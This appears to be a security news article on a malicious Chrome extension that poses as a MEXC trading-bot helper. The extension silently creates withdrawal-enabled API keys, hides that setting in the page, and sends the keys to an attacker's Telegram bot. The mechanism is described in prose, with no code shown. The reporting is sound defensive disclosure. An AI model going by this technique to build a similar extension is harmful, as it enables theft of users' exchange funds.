Cybersecurity researchers have detailed a malicious Google Chrome extension that can steal API keys related to MEXC, a centralized cryptocurrency exchange (CEX) available in more than 170 countries, while masquerading as a tool to automate transactions on the platform.
The extension is called MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh), has 29 downloads, and is still available in the Chrome Web Store at the time of writing. It was first published on September 1, 2025 by a developer named ‘jorjortan142’.
“The extension programmatically creates new MEXC API keys, enables withdrawal privileges, hides them in the user interface (UI), and leaks the generated API keys and secrets to a hardcoded Telegram bot controlled by the threat actor,” Sockets security researcher Kirill Boychenko said in an analysis.
According to the Chrome Web Store listing, this web browser add-on is described as an extension that “simplifies connecting trading bots to MEXC exchanges” by generating API keys with the necessary permissions on the admin page, including facilitating trading and withdrawals.
The installed extension then allows the attacker to take control of any MEXC account accessed from the compromised browser, allowing them to perform transactions, perform automated withdrawals, and even drain wallets and balances accessible through the service.
“In practice, as soon as the user navigates to MEXC’s API management page, the extension injects a single content script, script.js, and starts working within an already authenticated MEXC session,” Socket added. To accomplish this, the extension checks if the current URL contains the string “/user/openapi”, which refers to the API key management page.
Next, the script programmatically creates a new API key and ensures that the withdrawal feature is enabled. At the same time, they deface the page’s user interface to give users the impression that withdrawal permissions are disabled. Once the process of generating the access and private keys is complete, the script extracts both values and sends them using an HTTPS POST request to a hard-coded Telegram bot under the threat actor’s control.
This threat poses a significant risk because it remains active as long as the key is valid and not revoked, giving an attacker unfettered access to the victim’s account even if the extension is uninstalled from the Chrome browser.
“In effect, the attackers are using the Chrome Web Store as their delivery mechanism, MEXC Web UI as their execution environment, and Telegram as their exfiltration channel,” Boychenko noted. “The result is a proprietary credential-stealing extension that targets MEXC API keys once they are created and configured with full privileges.”
This attack is possible by leveraging an already authenticated browser session to accomplish its goals, eliminating the need to obtain the user’s password or bypass authentication protections.
It is not currently clear who is behind this operation, but references to “jorjortan142” point to an X handle of the same name that links to a Telegram bot named SwapSushiBot. SwapSushiBot is also promoted across TikTok and YouTube. YouTube channel was created on August 17, 2025.
“By hijacking a single API workflow within the browser, attackers can bypass many traditional controls and directly obtain long-lived API keys with revocation rights,” Socket said. “The same playbook can easily be applied to other exchanges, DeFi dashboards, broker portals, and web consoles that issue tokens during a session. Future variants may introduce stronger obfuscation, request broader browser permissions, and bundle support for multiple platforms into a single extension.”
Source link
